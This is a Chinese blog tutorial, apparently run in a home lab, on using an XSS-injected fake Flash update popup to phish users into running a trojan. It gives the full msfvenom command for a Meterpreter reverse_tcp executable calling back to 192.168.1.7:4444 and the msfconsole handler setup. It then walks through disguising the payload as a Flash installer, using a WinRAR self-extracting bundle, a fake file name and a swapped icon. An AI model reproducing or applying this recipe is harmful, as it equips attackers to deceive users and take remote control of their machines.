首页 > 其他分享 >xss flash钓鱼拿到主机控制权

xss flash钓鱼拿到主机控制权

时间:2024-07-25 12:28:02浏览次数:11  
标签:xss exe 网站 控制权 flash 点击 set 下载

第一步:本机已经开启phpstudy的web服务

第二步:下载Flash项目源码文件,并部署在网站根目录下,访问

项目地址:https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash

第三步:来到xssaq平台,点击公共模块---flash弹窗钓鱼-查看 将其中的代码保存成js文件放到我们网站的根目录下面

第四步:修改1.js中的代码,改成伪造的flash网站网址

第五步:打开kali,生成监听文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > shell.exe

#开启监听

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.7

set lport 4444

run

第六步:将生成的文件和Flash安装包用WinRAR一块压缩并更改文件名为"flashcenter_pp_ax_install_cn.exe",并做如图配置后,点击确定

第七步:使用ResourceHacker修改图标,进一步伪装

下载地址:Resource Hacker下载_Resource Hacker官方免费下载_2024最新版_华军软件园

 

第八步:模拟受害者的流程

输入以下代码,点击提交

登陆后台管理系统,输入admin,123456登陆,

跳转到以下页面,点击立即升级

点击下载后,运行安装程序,此时木马已被执行

第九步:获取到受害者网站控制权

标签:xss,exe,网站,控制权,flash,点击,set,下载
From: https://blog.csdn.net/m0_59151303/article/details/140645940

相关文章

  • Marvell 88Q6113 如何制作一个完整的量产固件88Q6113_flash.bin并进行烧录
    1、简介本章节介绍如何基于Marvell工具链,制作一个完整的量产固件88Q6113_flash.bin,集成用户自定义的配置文件config.bin,用于88Q6113的Flash烧录。注:Marvell88Q5072与Marvell88Q6113的配置流程是一样的。2、Marvell官方参考资料与工具链准备参考文档《Marvell88Q......
  • 零基础STM32单片机编程入门(二十) 华邦W25Q32 SPI FLASH实战含源码
    文章目录一.概要二.W25Q32SPIFLASH主要参数三.W25Q32SPIFLASH芯片介绍1.W25Q32芯片内部框图2.W25Q32芯片指令表格3.W25Q32芯片通讯时序四.W25Q32SPIFLASH读写实验五.CubeMX工程源代码下载六.小结一.概要FLASH是一种存储芯片,通过程序可以修改数据,即平时所......
  • FlashAttention全解
    目录LLM大模型训练加速利器FlashAttention详解一、FlashAttention1.1硬件基础1.2FlashAttention核心思想1.3计算前提1.4FlashAttention算法二、FlashAttention-22.1硬件特性2.2标准的注意力实现2.3FlashAttention-12.3.1前向传播2.3.2反向传播2.4FlashAttention-22.4......
  • 利用蓝莲花BlueLotus通过XSS获取Cookie
    蓝莲花BlueLotus_XSSReceiver清华大学蓝莲花战队做的一个平台,优点是足够小,不需要数据库,只要有个能运行php的环境就可以了,缺点是一般只适合一个人用。配置蓝莲花拉取dockerdockerpullromeoz/docker-apache-php:5.6上传文件文件下载地址:https://github.com/trysec/......
  • FLV(Flash Video)
    FLV(FlashVideo)是一种用于通过互联网传输视频和音频的文件格式。以下是对FLV文件格式的详细讲解:1.FLVHeaderFLV文件头部包含文件的基本信息,是文件的开头部分,通常占据9个字节。其结构如下:Signature(3bytes):表示文件类型,固定为"FLV"。Version(1byte):表示FLV文件版本,......
  • xss--flash钓鱼
    一.本机下载小皮面板开启环境     二.下载flash源文件下载地址:crowsec/crowsec_FakeFlashatmaster·crow821/crowsec·GitHub三.下载完成把网站部署在phpstudywww根目录下四新建一个1.js文件然后在xss平台找到flash弹窗钓鱼然后查看他的源代码复制到......
  • STM32读写FLASH
    要点:读写前要解锁并擦除整页才可以重新写入 测试代码#include"my_flash.H"/***@brief往内部FLASH写入数据*@paramaddr写入地址*@parampdata存储待写数据*@retvalNone*/voidFLASH_Inside_Wr(uint32_taddr,uint32_tPdata){//定义局部变......
  • 我在 pip install flash-attn 抛出错误时遇到错误
    在此输入代码我当前正在尝试安装“microsoft/Florence-2-large”模型并遵循文档在其github页面上提供。运行pipinstall时flash-attn--no-build-isolation我抛出此错误:Collectingflash_attnUsingcachedflash_attn-2.5.9.post1.tar.gz(2.6MB)Install......
  • 微信小程序--7(WXSS模板样式)
    目录一、概念二、扩展特性     (一)rpx尺寸单位(二)@import样式导入三、全局样式与局部样式(一)全局样式(二)局部样式一、概念        WXSS是一套样式语言,用来美化WXML的组件样式,类似网页开发中的CSS。二、扩展特性             与CSS相......
  • 通过渗透拿到对方web网站服务器控制权!让对方服务器成为木偶?
    一.靶场服务器打开(模拟要攻击的对象)1.1打开web服务1.2查看IP1.3右键计算机属性 远程设置不允许远程链接 (后面会通过远程渗透打开这个功能)1.4将服务器(此电脑)用户 设置密码并将服务器锁定二.打开win11攻击机上一篇文章中已经将对方网站登录密码破开,于是......